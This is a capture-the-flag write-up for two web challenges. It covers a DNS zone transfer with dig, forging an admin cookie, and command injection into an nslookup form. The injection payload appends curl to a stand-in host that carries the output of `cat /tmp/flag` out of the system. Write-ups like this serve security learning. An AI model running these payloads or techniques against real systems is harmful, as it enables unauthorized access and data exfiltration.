CTF Information
- Name: Monthly CTF Nov.
- Website: http://124.16.75.162:40002
- Type: Online
- Format: Jeopardy
Web1 听说贵司有一个神秘入口
Description
tips1: 神秘端口(40001-40009)
tips2: 扫目录
tips3: 注意域名
tips4: 神秘端口提供的是有漏洞的dns服务
tips5: 听说不用域名访问的都是坏蜀黍
http://124.16.75.162:40005
Solution
According to the hints, try to scan the ports:
40001/tcp filtered unknown
40002/tcp open unknown
40003/tcp open unknown
40004/tcp filtered unknown
40005/tcp open unknown
40006/tcp open unknown
40007/tcp closed unknown
40008/tcp closed unknown
40009/tcp open unknown
Focus on the filtered port: 40001 and 40003.
And then scan for the website. Find readme.txt
and directory upload
. And there is only a favico icon in the directory.
Look through the file readme.txt
. In the file, it points that we should access the website using another way. And there is a domain bluectf.com
in the inscirbe.
However, bluectf.com
has not been registered. And the tips4 tells that the DNS server is running on the port.
Try to use dig
to find the bluectf
using the specific dns.
dig @124.16.75.162 bluectf.com -p 40003
Shows Connection timed out.
So, use TCP instead of UDP.
dig @124.16.75.162 bluectf.com -p 40003 +tcp -t ANY
And got the result:
; <<>> DiG 9.8.3-P1 <<>> @124.16.75.162 bluectf.com -p 40003 +tcp -t ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1610
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;bluectf.com. IN ANY
;; ANSWER SECTION:
bluectf.com. 86400 IN SOA localhost. root.localhost. 1 604800 86400 2419200 86400
bluectf.com. 86400 IN NS bluedns.
;; Query time: 1 msec
;; SERVER: 124.16.75.162#40003(124.16.75.162)
;; WHEN: Sun Nov 20 12:05:26 2016
;; MSG SIZE rcvd: 100
The description shows that the DNS Server is vulnerable. And the result contains SOA
item. So try SOA vulnerability:
dig @124.16.75.162 axfr bluectf.com -p 40003 +tcp
Got:
; <<>> DiG 9.8.3-P1 <<>> @124.16.75.162 axfr bluectf.com -p 40003 +tcp
; (1 server found)
;; global options: +cmd
bluectf.com. 86400 IN SOA localhost. root.localhost. 1 604800 86400 2419200 86400
bluectf.com. 86400 IN NS bluedns.
bluedns.bluectf.com. 86400 IN A 124.16.75.162
flag1.bluectf.com. 86400 IN TXT "see http://bluedns.bluectf.com/flag_1_flag_123456.php"
bluectf.com. 86400 IN SOA localhost. root.localhost. 1 604800 86400 2419200 86400
;; Query time: 1 msec
;; SERVER: 124.16.75.162#40003(124.16.75.162)
;; WHEN: Sun Nov 20 12:15:27 2016
;; XFR size: 5 records (messages 1, bytes 232)
It tells where the flag is, however, the website should be accessed by domain not IP address. So add an item in hosts file:
124.16.75.162 bluedns.bluectf.com
And access: http://bluedns.bluectf.com:40005/flag_1_flag_123456.php
Capture the request, and in the request, it carries a Cookie. The value is the base64 encoded form of string guest
. Change it to the base64 encoded form of string admin
.
And got the flag: bluectf{zone_transfer_in_dns}
Web2 继续搞
Description
tips1:看index.php
tips2:无回显额,怎么办
Solution
Look at the page index.php
. It require the user input a host address. And it will send by GET
, and returns the nslookup
result.
So, it looks like commmand concat. So try to concat other commands using ;|&
and so on. And &
succeed.
Using cat
to show the flag, but it shows nothing. So using Web Server Log to pass out the flag.
Payload:
/index.php?host=127.0.0.1%26curl%20xxx.com%2f%60cat%20%2ftmp%2fflag%60
It shows the flag:
flag: bluectf{R3m0t3_C0d3_3x3cuti0n_in_ns100kup}